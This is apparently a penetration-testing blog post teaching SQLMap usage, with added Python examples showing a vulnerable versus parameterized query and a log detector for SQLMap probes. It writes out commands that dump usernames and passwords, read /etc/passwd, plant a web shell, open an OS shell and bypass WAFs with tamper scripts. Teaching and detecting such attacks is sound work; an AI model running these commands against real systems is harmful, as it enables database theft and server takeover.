SQLMap for Pentesters: Automating SQL Injection Like a Pro
SQL injection is one of the oldest — and still one of the most devastating — vulnerabilities in web applications. And when it comes to automating SQLi attacks, SQLMap is king.
This post breaks down what SQLMap does, how it works, and how to wield it efficiently during real-world penetration tests. No fluff. Just pure, targeted exploitation.
What Is SQLMap?
SQLMap is an open-source tool that automates the process of detecting and exploiting SQL injection flaws. It can:
- Identify injection points
- Enumerate databases, tables, and columns
- Extract data
- Read and write files on the host
- Gain command execution or even a shell (if misconfigurations allow it)
It supports multiple DBMSs: MySQL, MSSQL, Oracle, PostgreSQL, and more.
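Before automating anything, it helps to see what the flaw SQLMap hunts for actually looks like in code, and what the fix is. The following is an added example (not part of the original post and not SQLMap's own code): a Python function that builds the query by string concatenation, the way a vulnerable page.php would, beside the parameterized version. The in-memory SQLite table and the `products` rows are constructed sample data. The tautology input is the same class of probe SQLMap's boolean-based detection sends; the point is that the bound-parameter version cannot be steered by it at all.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory table standing in for page.php's backing store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", 0), (2, "gadget", 0), (3, "internal-only", 1)],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, id_param):
    """String concatenation: the request parameter becomes part of the SQL text,
    so a crafted value rewrites the WHERE clause (the pattern SQLMap detects)."""
    sql = "SELECT name FROM products WHERE id = " + id_param + " AND secret = 0"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, id_param):
    """Bound parameter: the value travels separately from the SQL text and can
    never change the query's structure. Type validation rejects junk early."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # not a valid id: return nothing rather than guessing
    sql = "SELECT name FROM products WHERE id = ? AND secret = 0"
    return [row[0] for row in conn.execute(sql, (id_value,))]


def demo():
    """Run both lookups against a benign id and a tautology probe (constructed input)."""
    conn = make_db()
    benign = "1"
    tautology = "1 OR 1=1 --"  # comments out the 'AND secret = 0' guard in the vulnerable query
    return {
        "vuln_benign": lookup_vulnerable(conn, benign),
        "vuln_tautology": lookup_vulnerable(conn, tautology),
        "param_benign": lookup_parameterized(conn, benign),
        "param_tautology": lookup_parameterized(conn, tautology),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The vulnerable lookup leaks the `secret = 1` row once the guard is commented out; the parameterized one returns exactly the same result for the benign id and nothing for the probe. That asymmetry is what a manual verification step (see the tips at the end of the post) is checking for before you hand the target to SQLMap.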
Installing SQLMap
On Kali Linux:
sudo apt install sqlmap
Or clone it:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Run it with:
python3 sqlmap.py
Basic Usage
Test a GET parameter:
sqlmap -u "http://target.com/page.php?id=1"
# -u: target URL with a parameter
Test a POST request:
sqlmap -u http://target.com/login.php --data "username=admin&password=admin"
# --data: POST data to inject
Enumerating the Database
After confirming injection:
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Lists all databases
Choose a DB and list tables:
sqlmap -u "http://target.com/page.php?id=1" -D users_db --tables
# -D: target database
List columns in a table:
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users --columns
# -T: target table
Dump data from columns:
sqlmap -u "http://target.com/page.php?id=1" -D users_db -T users -C username,password --dump
# -C: columns to dump
Using Cookies and Headers
Inject into a session cookie:
sqlmap -u http://target.com --cookie "PHPSESSID=abc123"
Custom headers (e.g. auth token):
sqlmap -u "http://target.com/page.php?id=1" -H "Authorization: Bearer TOKEN"
Reading and Writing Files (If Vulnerable)
Read /etc/passwd on the DB host:
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
Write a file (web shell example):
sqlmap -u "http://target.com/page.php?id=1" --file-write=./shell.php --file-dest="/var/www/html/shell.php"
OS Command Execution
If SQLMap detects the ability to execute commands:
sqlmap -u "http://target.com/page.php?id=1" --os-shell
This can sometimes give you an interactive shell on the system.
Bypasses and Tamper Scripts
SQLMap includes tamper scripts to bypass WAFs and filters:
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment
# You can chain tamper scripts with commas
Check available scripts:
ls /usr/share/sqlmap/tamper/
Saving and Reusing Sessions
To avoid re-running time-consuming scans:
sqlmap -u "http://target.com/page.php?id=1" --dump -s target_session.sqlite
# -s: session file to load/store progress in (sqlmap also keeps one automatically under its output directory)
Later, resume with the same target and session file:
sqlmap -u "http://target.com/page.php?id=1" -s target_session.sqlite
Using SQLMap with Burp Suite
Save your Burp request to a file (right-click → “Copy to file”) and use:
sqlmap -r request.txt
# -r: use a raw request file
This is useful for testing complex headers or parameters not shown in the URL.
Tips and Best Practices
- Always verify the injection manually before running a full dump
- Use --level and --risk to control depth: sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3
- Use --technique to test specific payload types (B: boolean, U: union, E: error-based, etc.)
- Be surgical: don't dump entire DBs unless scoped. Be specific with -D, -T, -C
Final Thoughts
SQLMap is powerful — but like all tools, it’s only as good as the hands wielding it. Understand the logic behind what it’s doing: union-based vs. error-based injection, time delays vs. blind, and so on.
Learn to recognize when not to use it. SQLMap is loud and will trigger alarms in production environments. In stealthy tests, manual SQLi or custom payloads might be better.
But when the gloves are off and it’s time to extract everything a vulnerable app can offer — SQLMap delivers.
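The "loud" point above, and the tamper-script section earlier, have a defensive flip side worth seeing concretely: SQLMap announces itself in the User-Agent header by default (unless the operator overrides it), and its payloads for the boolean, union, error and time-based techniques leave recognisable fragments in the query string even after a tamper like space2comment has swapped spaces for inline comments. The following is an added example (not from the original post, not part of SQLMap) of detection logic a blue team could run over web server access logs. The five log lines are constructed for the example, as is the user-agent string; the indicator regex covers the technique names the post lists and is an illustrative starting point, not a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /page.php?id=1/**/UNION/**/SELECT/**/NULL,NULL HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "GET /page.php?id=42 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments typical of boolean-, union-, error- and time-based probes (illustrative, not exhaustive).
PAYLOAD_RE = re.compile(
    r"\b(UNION\s+(ALL\s+)?SELECT|SLEEP\s*\(|BENCHMARK\s*\(|WAITFOR\s+DELAY|"
    r"AND\s+\d+\s*=\s*\d+|OR\s+\d+\s*=\s*\d+|EXTRACTVALUE\s*\(|UPDATEXML\s*\()",
    re.IGNORECASE,
)


def normalize(query_string):
    """Undo the cheap obfuscations tamper scripts apply before matching:
    URL-decode, replace inline comments (space2comment style) with spaces, collapse whitespace."""
    s = unquote_plus(query_string)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.strip()


def analyze(log_text):
    """Return one finding per suspicious line as (client_ip, reasons, decoded_query)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        path = m.group("path")
        query = path.split("?", 1)[1] if "?" in path else ""
        decoded = normalize(query)
        reasons = []
        if "sqlmap" in m.group("ua").lower():
            reasons.append("sqlmap user-agent")
        if PAYLOAD_RE.search(decoded):
            reasons.append("sqli payload pattern")
        if reasons:
            findings.append((m.group("ip"), ", ".join(reasons), decoded))
    return findings


def suspicious_sources(log_text, min_hits=2):
    """Clients with at least min_hits flagged requests: automated scanners fire many probes quickly."""
    counts = {}
    for ip, _reasons, _query in analyze(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
    print("sources to investigate:", suspicious_sources(SAMPLE_LOG))
```

The user-agent check alone is defeated by --random-agent, which is why the payload match runs on the decoded and comment-stripped query string as well; the per-source count is the cheap way to turn individual hits into an alert on the burst behaviour an automated scan produces.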
